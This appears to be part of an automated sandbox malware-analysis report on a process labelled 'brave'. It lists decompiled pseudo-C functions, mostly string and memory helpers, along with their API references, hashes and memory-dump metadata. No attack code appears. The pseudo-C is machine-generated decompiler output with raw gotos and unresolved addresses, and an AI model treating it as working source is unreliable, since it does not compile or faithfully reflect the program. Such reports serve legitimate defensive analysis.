				 *_t159 = 0x27;
				 *((long long*)(_t159 + 0x10)) = 0xa62b5340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t114 =  *(__rbx + 0x28);
				if (_t114 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032715;
				_t162 = (_t114 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t162 + 4)) = 0;
				 *(__rbx + 0x28) = _t114 + 1;
				 *_t162 = 0x27;
				 *((long long*)(_t162 + 0x10)) = 0xa62b5400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t116 =  *(__rbx + 0x28);
				if (_t116 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326ef;
				_t165 = (_t116 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t165 + 4)) = 0;
				 *(__rbx + 0x28) = _t116 + 1;
				 *_t165 = 0x27;
				 *((long long*)(_t165 + 0x10)) = 0xa62b53a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF67FF6A6005BC0();
				r9d = 0;
				E00007FF67FF6A6004DD0();
				_a40 = _t165;
				_t119 =  *(__rbx + 0x28);
				if (_t119 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032683;
				_t168 = (_t119 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t168 + 4)) = 0;
				 *(__rbx + 0x28) = _t119 + 1;
				 *_t168 = 0x27;
				 *((long long*)(_t168 + 0x10)) = 0xa62b53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0xa6005c22;
				E00007FF67FF6A6006EE0(_t168, __rbx);
				_a40 = _t168;
				if (_t168 == 0) goto 0xa6005c20;
				if ( *_t168 != 0x18) goto 0xa6005d39;
				goto 0xa6005c22;
				goto 0xa6006051;
				_t169 = _t168 + 1;
				 *(__rbx + 0x18) = _t169;
				E00007FF67FF6A60089F0(__rbx);
				E00007FF67FF6A6004DD0();
				_a40 = _t169;
				_t204 = _t169;
				goto 0xa6005f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t204[1]);
				E00007FF67FF6A60089F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0xa6006584;
				 *(__rbx + 0x18) = _t204;
				_t171 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0xa6005d30;
				_t214 = _a40;
				if (_t214 == 0) goto 0xa6005c20;
				_t122 =  *(__rbx + 0x38);
				if (_t122 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0xa6005c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t122 * 8)) = _t214;
				 *(__rbx + 0x38) = _t122 + 1;
				E00007FF67FF6A6004DD0();
				_a40 = _t171;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t214 + 3;
				E00007FF67FF6A6007F20(_t171, __rbx);
				_t205 = _t171;
				if (_t171 != 0) goto 0xa6006386;
				goto 0xa6005c20;
				asm("o16 nop [eax+eax]");
				_push(0xa62b53e0);
				_push(_t205);
				_push(__rbx);
				_t172 =  *(__rbx + 0x18);
				if (sil == 0) goto 0xa60066c8;
				 *(__rbx + 0x18) =  &(_t172[1]);
				r10d =  *_t172 & 0x000000ff;
				if (sil != 0) goto 0xa60066d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t103 = (r8d >> 0x1f) + r8d >> 1;
				_t149 =  *((intOrPtr*)( *((intOrPtr*)(0xa62b4820 + (_t103 + _t103 * 2) * 8)))) - r10b;
				if (_t149 == 0) goto 0xa6006680;
				if (_t149 <= 0) goto 0xa60066c0;
				r8d = _t103;
				if (0 != r8d) goto 0xa6006648;
				return 0;
			}

0x7ff6a6006306
0x7ff6a600630c
0x7ff6a6006323
0x7ff6a6006327
0x7ff6a600632f
0x7ff6a6006332
0x7ff6a6006338
0x7ff6a600633c
0x7ff6a6006340
0x7ff6a600634e
0x7ff6a6006350
0x7ff6a6006356
0x7ff6a6006369
0x7ff6a600636d
0x7ff6a6006375
0x7ff6a6006378
0x7ff6a6006383
0x7ff6a6006386
0x7ff6a600638d
0x7ff6a6006393
0x7ff6a600639a
0x7ff6a600639e
0x7ff6a60063b1
0x7ff6a60063b6
0x7ff6a60063c0
0x7ff6a60063c6
0x7ff6a60063dd
0x7ff6a60063e1
0x7ff6a60063e9
0x7ff6a60063ec
0x7ff6a60063f2
0x7ff6a60063f6
0x7ff6a60063ff
0x7ff6a6006405
0x7ff6a600641c
0x7ff6a6006420
0x7ff6a6006428
0x7ff6a600642b
0x7ff6a6006431
0x7ff6a6006435
0x7ff6a600643e
0x7ff6a6006444
0x7ff6a600645b
0x7ff6a600645f
0x7ff6a6006467
0x7ff6a600646a
0x7ff6a6006470
0x7ff6a6006474
0x7ff6a6006480
0x7ff6a6006485
0x7ff6a6006493
0x7ff6a6006498
0x7ff6a60064a2
0x7ff6a60064a8
0x7ff6a60064bf
0x7ff6a60064c3
0x7ff6a60064cb
0x7ff6a60064ce
0x7ff6a60064d4
0x7ff6a60064d8
0x7ff6a60064dc
0x7ff6a60064eb
0x7ff6a60064f0
0x7ff6a60064f8
0x7ff6a6006501
0x7ff6a6006507
0x7ff6a6006512
0x7ff6a6006517
0x7ff6a600651e
0x7ff6a6006522
0x7ff6a6006537
0x7ff6a600653c
0x7ff6a6006541
0x7ff6a6006544
0x7ff6a6006550
0x7ff6a6006557
0x7ff6a600655e
0x7ff6a600656a
0x7ff6a600656c
0x7ff6a6006570
0x7ff6a6006575
0x7ff6a600657c
0x7ff6a600657f
0x7ff6a6006584
0x7ff6a600658c
0x7ff6a6006592
0x7ff6a6006598
0x7ff6a60065a8
0x7ff6a60065b2
0x7ff6a60065ba
0x7ff6a60065bf
0x7ff6a60065d0
0x7ff6a60065da
0x7ff6a60065de
0x7ff6a60065e6
0x7ff6a60065ec
0x7ff6a60065f2
0x7ff6a60065f7
0x7ff6a6006600
0x7ff6a6006601
0x7ff6a6006602
0x7ff6a6006607
0x7ff6a6006614
0x7ff6a600661e
0x7ff6a6006626
0x7ff6a600662d
0x7ff6a6006633
0x7ff6a6006642
0x7ff6a6006656
0x7ff6a6006666
0x7ff6a6006669
0x7ff6a600666b
0x7ff6a600666d
0x7ff6a6006673
0x7ff6a600667e

APIs

malloc.MSVCRT ref: 00007FF6A6032752

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 0ebee6292a8557c15174a4ab0a03ffd8c5c9ca548531957df58a5e65fb3db361
Instruction ID: 824f41315b9eebfca9c009b267668dcc6720d0d25a940a54f3e3531b26424214
Opcode Fuzzy Hash: 0ebee6292a8557c15174a4ab0a03ffd8c5c9ca548531957df58a5e65fb3db361
Instruction Fuzzy Hash: B2113C72A0AB02C6E7118F14EA813A973B0FF94B49F259535C28C87399DF7EE595C384

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60063FF Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00007FF67FF6A60063FF(void* __rbx, signed char* _a40) {
				signed int _t69;
				signed int _t73;
				signed int _t75;
				signed int _t78;
				signed int _t81;
				void* _t102;
				intOrPtr* _t107;
				signed char* _t110;
				intOrPtr* _t113;
				signed char* _t114;
				signed char* _t116;
				signed char* _t117;
				signed char* _t139;
				signed char* _t140;
				long long _t147;

				_t73 =  *(__rbx + 0x28);
				if (_t73 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032715;
				_t107 = (_t73 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t107 + 4)) = 0;
				 *(__rbx + 0x28) = _t73 + 1;
				 *_t107 = 0x27;
				 *((long long*)(_t107 + 0x10)) = 0xa62b5400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t75 =  *(__rbx + 0x28);
				if (_t75 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326ef;
				_t110 = (_t75 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t110 + 4)) = 0;
				 *(__rbx + 0x28) = _t75 + 1;
				 *_t110 = 0x27;
				 *((long long*)(_t110 + 0x10)) = 0xa62b53a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF67FF6A6005BC0();
				r9d = 0;
				E00007FF67FF6A6004DD0();
				_a40 = _t110;
				_t78 =  *(__rbx + 0x28);
				if (_t78 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032683;
				_t113 = (_t78 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t113 + 4)) = 0;
				 *(__rbx + 0x28) = _t78 + 1;
				 *_t113 = 0x27;
				 *((long long*)(_t113 + 0x10)) = 0xa62b53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0xa6005c22;
				E00007FF67FF6A6006EE0(_t113, __rbx);
				_a40 = _t113;
				if (_t113 == 0) goto 0xa6005c20;
				if ( *_t113 != 0x18) goto 0xa6005d39;
				goto 0xa6005c22;
				goto 0xa6006051;
				_t114 = _t113 + 1;
				 *(__rbx + 0x18) = _t114;
				E00007FF67FF6A60089F0(__rbx);
				E00007FF67FF6A6004DD0();
				_a40 = _t114;
				_t139 = _t114;
				goto 0xa6005f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t139[1]);
				E00007FF67FF6A60089F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0xa6006584;
				 *(__rbx + 0x18) = _t139;
				_t116 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0xa6005d30;
				_t147 = _a40;
				if (_t147 == 0) goto 0xa6005c20;
				_t81 =  *(__rbx + 0x38);
				if (_t81 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0xa6005c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t81 * 8)) = _t147;
				 *(__rbx + 0x38) = _t81 + 1;
				E00007FF67FF6A6004DD0();
				_a40 = _t116;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t147 + 3;
				E00007FF67FF6A6007F20(_t116, __rbx);
				_t140 = _t116;
				if (_t116 != 0) goto 0xa6006386;
				goto 0xa6005c20;
				asm("o16 nop [eax+eax]");
				_push(0xa62b53e0);
				_push(_t140);
				_push(__rbx);
				_t117 =  *(__rbx + 0x18);
				if (sil == 0) goto 0xa60066c8;
				 *(__rbx + 0x18) =  &(_t117[1]);
				r10d =  *_t117 & 0x000000ff;
				if (sil != 0) goto 0xa60066d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t69 = (r8d >> 0x1f) + r8d >> 1;
				_t102 =  *((intOrPtr*)( *((intOrPtr*)(0xa62b4820 + (_t69 + _t69 * 2) * 8)))) - r10b;
				if (_t102 == 0) goto 0xa6006680;
				if (_t102 <= 0) goto 0xa60066c0;
				r8d = _t69;
				if (0 != r8d) goto 0xa6006648;
				return 0;
			}

0x7ff6a60063ff
0x7ff6a6006405
0x7ff6a600641c
0x7ff6a6006420
0x7ff6a6006428
0x7ff6a600642b
0x7ff6a6006431
0x7ff6a6006435
0x7ff6a600643e
0x7ff6a6006444
0x7ff6a600645b
0x7ff6a600645f
0x7ff6a6006467
0x7ff6a600646a
0x7ff6a6006470
0x7ff6a6006474
0x7ff6a6006480
0x7ff6a6006485
0x7ff6a6006493
0x7ff6a6006498
0x7ff6a60064a2
0x7ff6a60064a8
0x7ff6a60064bf
0x7ff6a60064c3
0x7ff6a60064cb
0x7ff6a60064ce
0x7ff6a60064d4
0x7ff6a60064d8
0x7ff6a60064dc
0x7ff6a60064eb
0x7ff6a60064f0
0x7ff6a60064f8
0x7ff6a6006501
0x7ff6a6006507
0x7ff6a6006512
0x7ff6a6006517
0x7ff6a600651e
0x7ff6a6006522
0x7ff6a6006537
0x7ff6a600653c
0x7ff6a6006541
0x7ff6a6006544
0x7ff6a6006550
0x7ff6a6006557
0x7ff6a600655e
0x7ff6a600656a
0x7ff6a600656c
0x7ff6a6006570
0x7ff6a6006575
0x7ff6a600657c
0x7ff6a600657f
0x7ff6a6006584
0x7ff6a600658c
0x7ff6a6006592
0x7ff6a6006598
0x7ff6a60065a8
0x7ff6a60065b2
0x7ff6a60065ba
0x7ff6a60065bf
0x7ff6a60065d0
0x7ff6a60065da
0x7ff6a60065de
0x7ff6a60065e6
0x7ff6a60065ec
0x7ff6a60065f2
0x7ff6a60065f7
0x7ff6a6006600
0x7ff6a6006601
0x7ff6a6006602
0x7ff6a6006607
0x7ff6a6006614
0x7ff6a600661e
0x7ff6a6006626
0x7ff6a600662d
0x7ff6a6006633
0x7ff6a6006642
0x7ff6a6006656
0x7ff6a6006666
0x7ff6a6006669
0x7ff6a600666b
0x7ff6a600666d
0x7ff6a6006673
0x7ff6a600667e

APIs

malloc.MSVCRT ref: 00007FF6A6032752

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 277ec0329c7c4dbc9df98e64df30877a426ff65a56704ba7fd0b275a463b7bd2
Instruction ID: 4055efc8d477bfbbfcd11c5a5d9016d623a1691af9b8f09d81b6ba17eb09ed71
Opcode Fuzzy Hash: 277ec0329c7c4dbc9df98e64df30877a426ff65a56704ba7fd0b275a463b7bd2
Instruction Fuzzy Hash: F711217290AB02C6E7158F14EA8036973B0FF94B49F659535C28D87399DF7EE5A1C380

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF6A60029D0 Relevance: 9.1, APIs: 7, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd3c0788ace8e5d82bcee7962f1b7f621a1a097344988d1170d49da7047890e
Instruction ID: 6214eaaeaecd04ac631e92ddb665025145764b8f4b73717245efb32a4f505f07
Opcode Fuzzy Hash: 8cd3c0788ace8e5d82bcee7962f1b7f621a1a097344988d1170d49da7047890e
Instruction Fuzzy Hash: 8112E52291A7C285F7118B29E5097BA67A0FF95F94F418231EE9C83796EF7ED190C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600F6C0 Relevance: 9.0, APIs: 6, Instructions: 35
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A600F6C0(void* __rcx) {
				long _t1;

				_t1 = GetLastError();
				if (_t1 != 0) goto 0xa600f6e0;
				return _t1;
			}

0x7ff6a600f6ca
0x7ff6a600f6d2
0x7ff6a600f6db

APIs

GetLastError.KERNEL32 ref: 00007FF6A600F6CA
FormatMessageA.KERNEL32 ref: 00007FF6A600F70B
IsDebuggerPresent.KERNEL32 ref: 00007FF6A600F715

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: DebuggerErrorFormatLastMessagePresent
String ID:
API String ID: 2392558662-0
Opcode ID: 45af6df8f3c1be2e0205f91125e02e1abf725a7bbf325bdbd81304aa25dfb69b
Instruction ID: 2ef1d8d68c7fffb668f606fbbe9d76ff2851f89d7aa2a1302e7daac3aca16539
Opcode Fuzzy Hash: 45af6df8f3c1be2e0205f91125e02e1abf725a7bbf325bdbd81304aa25dfb69b
Instruction Fuzzy Hash: 8F011D61B1AA0281E764DF25F95872A63A0BB99FC4F580034DE4EC6668EF3EE4959700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6028100 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 73
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00007FF67FF6A6028100(long long* __rcx, void* __rdx, void* __r8, void* __r9, void* _a40) {

				if (__r9 - 0xfffffff9 + __r8 - __rdx -  *((intOrPtr*)( *((intOrPtr*)(__rcx)) - 0x18)) > 0) goto 0xa6028180;
				E00007FF67FF6A6028580(__rcx, __rdx -  *((intOrPtr*)(__rcx)), __r8 - __rdx, __r9);
				if (__r9 == 0) goto 0xa602815e;
				if (__r9 == 1) goto 0xa6028170;
				return memset(??, ??, ??);
			}

0x7ff6a6028133
0x7ff6a602813b
0x7ff6a6028143
0x7ff6a6028150
0x7ff6a602816a

APIs

strlen.MSVCRT ref: 00007FF6A60281A9

Part of subcall function 00007FF6A6028580: memcpy.MSVCRT ref: 00007FF6A60285FB

memset.MSVCRT ref: 00007FF6A6028159

Strings

basic_string::_M_replace_aux, xrefs: 00007FF6A6028180

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: basic_string::_M_replace_aux
API String ID: 160209724-2536181960
Opcode ID: e13b374acd0977eb9fd4fe879805c0dd20afc90dbef44aaa3ecbdcb4d051adf7
Instruction ID: 59ad3b30923fb0515a5287ef0ba7cd81989d6ce46dec937c141a84564d678b80
Opcode Fuzzy Hash: e13b374acd0977eb9fd4fe879805c0dd20afc90dbef44aaa3ecbdcb4d051adf7
Instruction Fuzzy Hash: 25110112F1A1A801A811AA2B7D454AA92142F9AFE4E884371EF2C5B7C1DD3C98D2C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60281D0 Relevance: 2.5, Strings: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FF67FF6A60281D0(long long* __rcx, void* __rdx, void* __r8, void* __r9, intOrPtr _a40) {
				void* _t5;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr _t35;

				_t27 = _a40;
				_t24 =  *((intOrPtr*)(__rcx));
				_t35 =  *((intOrPtr*)(_t24 - 0x18));
				if (__rdx - _t35 > 0) goto 0xa602839f;
				_t30 =  >  ? __r8 : _t35 - __rdx;
				if (_t27 - 0xfffffff9 - _t35 + ( >  ? __r8 : _t35 - __rdx) > 0) goto 0xa6028393;
				if (_t24 - __r9 > 0) goto 0xa6028240;
				if (__r9 - _t35 + _t24 > 0) goto 0xa6028240;
				if ( *((intOrPtr*)(_t24 - 8)) <= 0) goto 0xa6028288;
				_t5 = E00007FF67FF6A6028580(__rcx, __rdx,  >  ? __r8 : _t35 - __rdx, _t27);
				if (_t27 == 0) goto 0xa6028272;
				if (_t27 == 1) goto 0xa60282f0;
				0xa6021698();
				return _t5;
			}

0x7ff6a60281dd
0x7ff6a60281e8
0x7ff6a60281f1
0x7ff6a60281f8
0x7ff6a6028211
0x7ff6a602821e
0x7ff6a6028227
0x7ff6a602822f
0x7ff6a6028236
0x7ff6a602824c
0x7ff6a6028254
0x7ff6a6028261
0x7ff6a602826d
0x7ff6a6028282

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A60283A9
basic_string::replace, xrefs: 00007FF6A60283A2

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 0-3564965661
Opcode ID: 52bc733c84fad3ed6fbef407dfbaf4f05d60fd4f932c361f6de10b9818d5177c
Instruction ID: 538b56163cadf37c0f1ae918563e174180296157687e9f708b0062714042b86b
Opcode Fuzzy Hash: 52bc733c84fad3ed6fbef407dfbaf4f05d60fd4f932c361f6de10b9818d5177c
Instruction Fuzzy Hash: 6FF03055F09A86A0D900AF63D9058FAA321BF5AFC8F445432FF0CAB356DE29D191C344

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A602C000 Relevance: 2.5, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF67FF6A602C000(void* __rcx, intOrPtr* __rdx, void* __r8, void* __r9) {
				long long _v24;
				void* _t7;
				void* _t12;
				intOrPtr _t21;

				_t21 =  *((intOrPtr*)(__rdx + 8));
				_t12 = _t21 - __r8;
				_t19 =  <=  ? _t12 : __r9;
				if (__r8 - _t21 > 0) goto 0xa602c036;
				_v24 =  <=  ? _t12 : __r9;
				return E00007FF67FF6A602AE20(0, _t7, __rcx, __rdx,  *((intOrPtr*)(__rcx + 8)),  *__rdx + __r8);
			}

0x7ff6a602c004
0x7ff6a602c00b
0x7ff6a602c011
0x7ff6a602c01b
0x7ff6a602c01d
0x7ff6a602c035

Strings

basic_string::assign, xrefs: 00007FF6A602C039
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A602C040

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
